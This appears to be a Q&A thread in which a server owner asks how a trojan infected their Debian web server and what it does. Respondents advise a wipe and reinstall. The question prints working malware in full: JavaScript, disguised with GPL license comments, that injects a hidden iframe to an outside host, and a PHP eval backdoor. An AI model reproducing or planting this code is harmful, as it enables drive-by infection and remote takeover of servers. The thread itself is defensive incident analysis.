Getting rid of Trojan on Debian Server

Question

-------- EDIT ---------

I do not agree that this is a duplicate of the linked question. I know that the correct way to deal with this is to wipe and reinstall the server. However, i am interested in the inner workings of this specific exploit and still happy if someone can help me out with some tips.

i'm trying to find out how a trojan made it onto my server, with no success so far and what exactly it is trying to achieve. I tried several malware scanners and antivirus solutions to get some details on this thing and they all were unable to detect something. However many js files on my server got modified and injected with following snippet:

/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function getCookie(name) {
/*
Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the original
licensor to copy, distribute or modify the Program subject to these
terms and conditions.  You may not impose any further restrictions on the
recipients' exercise of the rights granted herein.
*/
var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);
/*The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time.  Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.*/
if (!Smiledbob && assa_a) {
document.write('<iframe src="http://bablastules.vila.com.ar/htrsjdrjfgerhrdtjytd16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();
/*
Each version is given a distinguishing version number.  If the Program
specifies a version number of the license which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation.  If the Program does not specify a version number of
the license, you may choose any version ever published by the Free Software
Foundation.
*/
}
}
Lightebrothermind();
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt

I put an audit on one of the modified js files and this is the result:

    type=PATH msg=audit(1410282146.532:1496): item=0 name="/PATH/TO/myfile.js" inode=1628304 dev=fd:00 mode=0100664 ouid=10007 ogid=2001 rdev=00:00
type=CWD msg=audit(1410282146.532:1496):  cwd="/PATH/TO/"
type=SYSCALL msg=audit(1410282146.532:1496): arch=c000003e syscall=2 success=yes exit=60 a0=7fcf4646ca88 a1=241 a2=1b6 a3=692f736a2f756162 items=1 ppid=26429 pid=26769 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/lib/apache2/mpm-prefork/apache2" key=(null)

When i switch to the folder that according to the audit contains the modifying file, i find a php file with what seems like a randomly generated filename and following content:

 <?php
if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;

which looks like a backdoor to me. The weird thing though is, that the file is not executable (664) and when i modify it to write the injected code to a textfile, nothing happens.

So where do i start to solve this? I'm really happy for any input as i'm really starting to pull my hair out.

Oh when i search in files for the code, i find a lot of similar files, spreaded all over the webfolders on my server. When i turn apache off, the modifying of files stops. I suspect that the Trojan made it into our server via a Wordpress Plugin, which supposedly had a vulnerability that exposed a loophole for attackers.

Thank you so much, i will happily provide any further info needed.

i already read that one, thanks. however as this is obviously not a targeted, focused attack but a random one and i know that there is no root access (or access at all other than through the apache user, which is very limited) i would be really thankful for tips on removing this thing without having to wipe the whole server. — user871784, Sep 09 '14 at 19:57
Respectfully, you missed the point of the linked post. Responsible system administrators do not fix hacked servers. They wipe and replace. And specifically in your case, how do you know that a root exploit was not the cause? They only way to know that is to know what exploit was used, and if you knew that then you'd already have it fixed. — longneck, Sep 09 '14 at 20:09
Besides the point @longneck has specified, simply forget any malware scanners since they are more designed to identify virus-like behavior, not for your cases where web related exploit is much more likely. And wiping machine alone is useless since the exploit target will still remain after machine reinstallation. So before wiping, **identify the attack path** first. — Abel Cheung, Sep 09 '14 at 20:22
yeah you are right. i assumed that there was no root exploit as i could easily stop the activity of the scripts by shutting down apache or modifying the rights of the files. Plus the discovery of the vulnerability in said plugin was exactly in the timeframe the thing occured on my server. however you are right, i dont know for sure and should wipe and replace. really would love to find out what that trojan is doing anyways... — user871784, Sep 09 '14 at 20:22
I wrote [an answer on Security.SE](http://security.stackexchange.com/a/9259/1472) a while ago about this. Finding how they got in is not always possible but if you can find the method it's nice to be able to fix that specific hole. You will still need to wipe and re-install and upgrade everything. — Ladadadada, Sep 11 '14 at 10:45
Thanks for your comment. As i said before I do understand I have to wipe the server. I would just like to know what happened (if that is possible of course) in order to know where i have to apply some extra care on the new install. And yes also because of personal interest. — user871784, Sep 11 '14 at 10:52

score 1 · Answer 1 · answered Sep 09 '14 at 20:25

1

The code you sharing is linked to Nuclear Exploit kit. There is code that will continue to inject iframe s in all pages on your server. It is best to clear the site and restart from a backup. The backdoor you mentioned is also tied to attacks against CMS vulnerabilities. I am a malware researcher and would be willing to help clean up your system if you need.

answered Sep 09 '14 at 20:25

Adam

11
1

Hey Adam, that would be great - where can I contact you? – user871784 Sep 10 '14 at 01:30
Sorry for the delay I am in europe so there is a time difference. What would be the best email to reach out to you ? – Adam Sep 10 '14 at 07:39

Getting rid of Trojan on Debian Server

1 Answers1